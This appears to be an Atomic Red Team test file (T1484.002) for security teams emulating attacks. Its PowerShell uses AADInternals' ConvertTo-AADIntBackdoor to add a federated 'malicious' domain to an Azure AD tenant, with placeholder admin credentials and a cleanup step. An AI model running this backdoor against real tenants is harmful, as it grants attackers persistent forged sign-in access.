Josh Rickard
a5dd0813cd
* fix: Updating atomics YAML file structure to align with the new JSON schema definition. This also fixes some white space issues and general line formatting across all impacted atomics. * fix: One additional change needed --------- Co-authored-by: MSAdministrator <MSAdministrator@users.noreply.github.com> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
96 lines
3.3 KiB
YAML
96 lines
3.3 KiB
YAML
attack_technique: T1484.002
|
|
display_name: Domain Trust Modification
|
|
atomic_tests:
|
|
- name: Add Federation to Azure AD
|
|
auto_generated_guid: 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7
|
|
description: |
|
|
Add a new federated domain to Azure AD using PowerShell.
|
|
The malicious domain to be federated must be configured beforehand (outside of the scope of this test):
|
|
1. Open Azure Portal
|
|
2. Add a new "custom domain name"
|
|
3. Verify the domain by following instructions (i.e. create the requested DNS record)
|
|
supported_platforms:
|
|
- azure-ad
|
|
input_arguments:
|
|
azure_username:
|
|
description: Username of a privileged Azure AD account such as External Identity Provider Administrator or Global Administrator roles
|
|
type: string
|
|
default: bruce.wayne@contosocloud.com
|
|
azure_password:
|
|
description: Password of azure_username
|
|
type: string
|
|
default: iamthebatman
|
|
domain_name:
|
|
description: Malicious federated domain name
|
|
type: string
|
|
default: contoso.com
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
AzureAD and AADInternals Powershell modules must be installed.
|
|
prereq_command: |
|
|
if ((Get-Module -ListAvailable -Name AzureAD) -And (Get-Module -ListAvailable -Name AADInternals)) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
Install-Module -Name AzureAD -Force
|
|
Install-Module -Name AADInternals -Force
|
|
executor:
|
|
command: |
|
|
Import-Module AzureAD
|
|
Import-Module AADInternals
|
|
|
|
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
|
|
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
|
|
|
|
try {
|
|
Connect-AzureAD -Credential $Credential -ErrorAction Stop > $null
|
|
}
|
|
catch {
|
|
Write-Host "Error: AzureAD could not connect"
|
|
exit 1
|
|
}
|
|
|
|
try {
|
|
$domain = Get-AzureADDomain -Name "#{domain_name}"
|
|
}
|
|
catch {
|
|
Write-Host "Error: domain ""#{domain_name}"" not found"
|
|
exit 1
|
|
}
|
|
if (-Not $domain.IsVerified) {
|
|
Write-Host "Error: domain ""#{domain_name}"" not verified"
|
|
exit 1
|
|
}
|
|
|
|
if ($domain.AuthenticationType -eq "Federated") {
|
|
Write-Host "Error: domain ""#{domain_name}"" already federated. Try with a different domain or re-create it before."
|
|
exit 1
|
|
}
|
|
|
|
$at = Get-AADIntAccessTokenForAADGraph -Credentials $Credential
|
|
if (-Not $at) {
|
|
Write-Host "Error: AADInternals could not connect"
|
|
exit 1
|
|
}
|
|
|
|
$new = ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "#{domain_name}"
|
|
if ($new) {
|
|
Write-Host "Federation successfully added to Azure AD"
|
|
Write-Host $new
|
|
}
|
|
else {
|
|
Write-Host "The federation setup failed"
|
|
}
|
|
|
|
Write-Host "End of federation configuration."
|
|
cleanup_command: |
|
|
try {
|
|
Import-Module AzureAD -ErrorAction Ignore
|
|
|
|
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
|
|
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
|
|
Connect-AzureAD -Credential $Credential -ErrorAction Ignore > $null
|
|
|
|
Remove-AzureADDomain -Name "#{domain_name}" -ErrorAction Ignore
|
|
} catch {}
|
|
name: powershell
|